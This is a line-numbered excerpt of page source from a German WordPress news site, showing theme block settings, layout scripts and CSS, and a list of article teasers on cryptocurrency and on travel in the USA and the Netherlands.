categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_bg_hover":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_200","tdc_css_class":"tdi_200","tdc_css_class_style":"tdi_200_rand_style"}';
  2244. block_tdi_200.td_column_number = "1";
  2245. block_tdi_200.block_type = "td_flex_block_1";
  2246. block_tdi_200.post_count = "9";
  2247. block_tdi_200.found_posts = "3784";
  2248. block_tdi_200.header_color = "";
  2249. block_tdi_200.ajax_pagination_infinite_stop = "";
  2250. block_tdi_200.max_num_pages = "421";
  2251. tdBlocksArray.push(block_tdi_200);
  2252. </script><div class="td-block-title-wrap"></div><div id=tdi_200 class="td_block_inner td-mc1-wrap">
  2253.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2254.            <div class="td-module-container td-category-pos-above">
  2255.                                    <div class="td-image-container">
  2256.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                                                                    </div>
  2257.                
  2258.                <div class="td-module-meta-info">
  2259.                                        
  2260.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  2261.                    
  2262.                                            <div class="td-editor-date">
  2263.                                                        
  2264.                                                            <span class="td-author-date">
  2265.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >Mai 4, 2024</time></span>                                                                                                        </span>
  2266.                                                    </div>
  2267.                    
  2268.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  2269.                    
  2270.                                    </div>
  2271.            </div>
  2272.        </div>
  2273.  
  2274.        
  2275.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2276.            <div class="td-module-container td-category-pos-above">
  2277.                                    <div class="td-image-container">
  2278.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                                                                    </div>
  2279.                
  2280.                <div class="td-module-meta-info">
  2281.                                        
  2282.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  2283.                    
  2284.                                            <div class="td-editor-date">
  2285.                                                        
  2286.                                                            <span class="td-author-date">
  2287.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T10:51:42+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  2288.                                                    </div>
  2289.                    
  2290.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  2291.                    
  2292.                                    </div>
  2293.            </div>
  2294.        </div>
  2295.  
  2296.        
  2297.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2298.            <div class="td-module-container td-category-pos-above">
  2299.                                    <div class="td-image-container">
  2300.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2301.                
  2302.                <div class="td-module-meta-info">
  2303.                                        
  2304.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>
  2305.                    
  2306.                                            <div class="td-editor-date">
  2307.                                                        
  2308.                                                            <span class="td-author-date">
  2309.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T09:51:40+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  2310.                                                    </div>
  2311.                    
  2312.                    <div class="td-excerpt">Ein Roadtrip durch die USA mit dem Mietwagen –...</div>
  2313.                    
  2314.                                    </div>
  2315.            </div>
  2316.        </div>
  2317.  
  2318.        
  2319.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2320.            <div class="td-module-container td-category-pos-above">
  2321.                                    <div class="td-image-container">
  2322.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" class="td-image-wrap " title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2323.                
  2324.                <div class="td-module-meta-info">
  2325.                                        
  2326.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer">Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer</a></h3>
  2327.                    
  2328.                                            <div class="td-editor-date">
  2329.                                                        
  2330.                                                            <span class="td-author-date">
  2331.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T08:51:38+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  2332.                                                    </div>
  2333.                    
  2334.                    <div class="td-excerpt">Kalifornien, der Sonnenstaat der USA, ist ein Mekka für...</div>
  2335.                    
  2336.                                    </div>
  2337.            </div>
  2338.        </div>
  2339.  
  2340.        
  2341.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2342.            <div class="td-module-container td-category-pos-above">
  2343.                                    <div class="td-image-container">
  2344.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" class="td-image-wrap " title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-8-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2345.                
  2346.                <div class="td-module-meta-info">
  2347.                                        
  2348.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung">Die besten Hotels in Las Vegas: Eine umfassende Anleitung</a></h3>
  2349.                    
  2350.                                            <div class="td-editor-date">
  2351.                                                        
  2352.                                                            <span class="td-author-date">
  2353.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T07:52:08+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  2354.                                                    </div>
  2355.                    
  2356.                    <div class="td-excerpt">Las Vegas, bekannt für seine glitzernden Lichter, erstklassigen Unterhaltungsmöglichkeiten...</div>
  2357.                    
  2358.                                    </div>
  2359.            </div>
  2360.        </div>
  2361.  
  2362.        
  2363.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2364.            <div class="td-module-container td-category-pos-above">
  2365.                                    <div class="td-image-container">
  2366.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" class="td-image-wrap " title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-9-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2367.                
  2368.                <div class="td-module-meta-info">
  2369.                                        
  2370.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer">Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer</a></h3>
  2371.                    
  2372.                                            <div class="td-editor-date">
  2373.                                                        
  2374.                                                            <span class="td-author-date">
  2375.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T11:43:48+02:00" >Mai 1, 2024</time></span>                                                                                                        </span>
  2376.                                                    </div>
  2377.                    
  2378.                    <div class="td-excerpt">Wenn Sie planen, in den Vereinigten Staaten zu fahren,...</div>
  2379.                    
  2380.                                    </div>
  2381.            </div>
  2382.        </div>
  2383.  
  2384.        
  2385.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2386.            <div class="td-module-container td-category-pos-above">
  2387.                                    <div class="td-image-container">
  2388.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" class="td-image-wrap " title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-15-696x391.jpg"  ></span></a></div>                                                                    </div>
  2389.                
  2390.                <div class="td-module-meta-info">
  2391.                                        
  2392.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange">Königstag in den Niederlanden: Ein lebendiges Fest in Orange</a></h3>
  2393.                    
  2394.                                            <div class="td-editor-date">
  2395.                                                        
  2396.                                                            <span class="td-author-date">
  2397.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T10:43:47+02:00" >Mai 1, 2024</time></span>                                                                                                        </span>
  2398.                                                    </div>
  2399.                    
  2400.                    <div class="td-excerpt">Jedes Jahr verwandelt sich die Niederlande in ein Meer...</div>
  2401.                    
  2402.                                    </div>
  2403.            </div>
  2404.        </div>
  2405.  
  2406.        
  2407.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2408.            <div class="td-module-container td-category-pos-above">
  2409.                                    <div class="td-image-container">
  2410.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" class="td-image-wrap " title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-16-696x391.jpg"  ></span></a></div>                                                                    </div>
  2411.                
  2412.                <div class="td-module-meta-info">
  2413.                                        
  2414.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande">Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande</a></h3>
  2415.                    
  2416.                                            <div class="td-editor-date">
  2417.                                                        
  2418.                                                            <span class="td-author-date">
  2419.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T09:43:46+02:00" >Mai 1, 2024</time></span>                                                                                                        </span>
  2420.                                                    </div>
  2421.                    
  2422.                    <div class="td-excerpt">Die Niederlande, mit Amsterdam als strahlendem Juwel, stehen bei...</div>
  2423.                    
  2424.                                    </div>
  2425.            </div>
  2426.        </div>
  2427.  
  2428.        
  2429.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2430.            <div class="td-module-container td-category-pos-above">
  2431.                                    <div class="td-image-container">
  2432.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/usa-reise-2024/" rel="bookmark" class="td-image-wrap " title="USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-17-696x391.jpg"  ></span></a></div>                                                                    </div>
  2433.                
  2434.                <div class="td-module-meta-info">
  2435.                                        
  2436.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/usa-reise-2024/" rel="bookmark" title="USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien">USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien</a></h3>
  2437.                    
  2438.                                            <div class="td-editor-date">
  2439.                                                        
  2440.                                                            <span class="td-author-date">
  2441.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-01T08:43:45+02:00" >Mai 1, 2024</time></span>                                                                                                        </span>
  2442.                                                    </div>
  2443.                    
  2444.                    <div class="td-excerpt">Eine Reise in die USA ist für viele ein...</div>
  2445.                    
  2446.                                    </div>
  2447.            </div>
  2448.        </div>
  2449.  
  2450.        </div></div></div></div></div><div class="vc_column_inner tdi_202  wpb_column vc_column_container tdc-inner-column td-pb-span3 td-is-sticky">
  2451. <style scoped>.tdi_202{vertical-align:baseline}.tdi_202 .vc_column-inner>.wpb_wrapper,.tdi_202 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_202 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" data-sticky-offset="20" data-sticky-is-width-auto="W2ZhbHNlLGZhbHNlLGZhbHNlLGZhbHNlXQ=="><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_203 tdm-inline-block td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_203" >
  2452. <style>.tdi_203{margin-left:20px!important;padding-top:8px!important;padding-right:16px!important;padding-bottom:10px!important;padding-left:14px!important;z-index:1!important;position:relative}@media (min-width:1019px) and (max-width:1140px){.tdi_203{margin-left:15px!important;padding-top:6px!important;padding-right:14px!important;padding-bottom:8px!important;padding-left:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_203{margin-left:10px!important;padding-top:4px!important;padding-right:12px!important;padding-bottom:6px!important;padding-left:10px!important}}</style>
  2453. <style>.tdi_203{text-align:left!important}.tdi_203 .tdm-descr{color:#ffffff;font-family:PT Serif!important;font-size:20px!important;font-weight:700!important;letter-spacing:0.5px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_203 .tdm-descr{font-size:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_203 .tdm-descr{font-size:16px!important}}</style>
  2454. <div class="tdi_203_rand_style td-element-style"><style>
  2455. .tdi_203_rand_style{
  2456. background-color:#000000 !important;
  2457. }
  2458. </style></div><p class="tdm-descr">Marketing</p></div><div class="td_block_wrap td_flex_block_2 tdi_204 td-flb-margin-left td-pb-border-top td_block_template_2 td_flex_block"  data-td-block-uid="tdi_204" >
  2459. <style>.tdi_204{margin-top:-24px!important;margin-bottom:30px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_204{margin-top:-20px!important;margin-bottom:20px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_204{margin-top:-16px!important;margin-bottom:16px!important}}</style>
  2460. <style>.tdi_204 .td-module-thumb{height:420px}.tdi_204 .td-module-thumb{margin-left:-0px}.tdi_204 .td_module_wrap{margin-bottom:0px}.tdi_204 .td_module_wrap:last-child{margin-bottom:0}.tdi_204.td_with_ajax_pagination .td-next-prev-wrap{align-items:flex-start;justify-content:flex-end;padding:20px 20px 0 0}.tdi_204.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_204 .td-load-more-wrap a{padding:0px;border-width:0px;border-radius:2px}.tdi_204 .page-nav .pages{padding-right:0}.tdi_204.td_with_ajax_pagination .td-next-prev-wrap a,.tdi_204 .td-load-more-wrap a i{font-size:20px}.tdi_204 .td-load-more-wrap a .td-load-more-icon-svg svg,.tdi_204.td_with_ajax_pagination .td-next-prev-wrap .td-next-prev-icon-svg svg{width:20px;height:calc(20px + 1px)}.tdi_204 .entry-thumb{background-position:center 50%}body .tdi_204 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_204 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}.tdi_204 .td-post-vid-time{display:inline-block}.tdi_204 .td-post-category{padding:5px 8px;border-radius:2px;font-family:Work 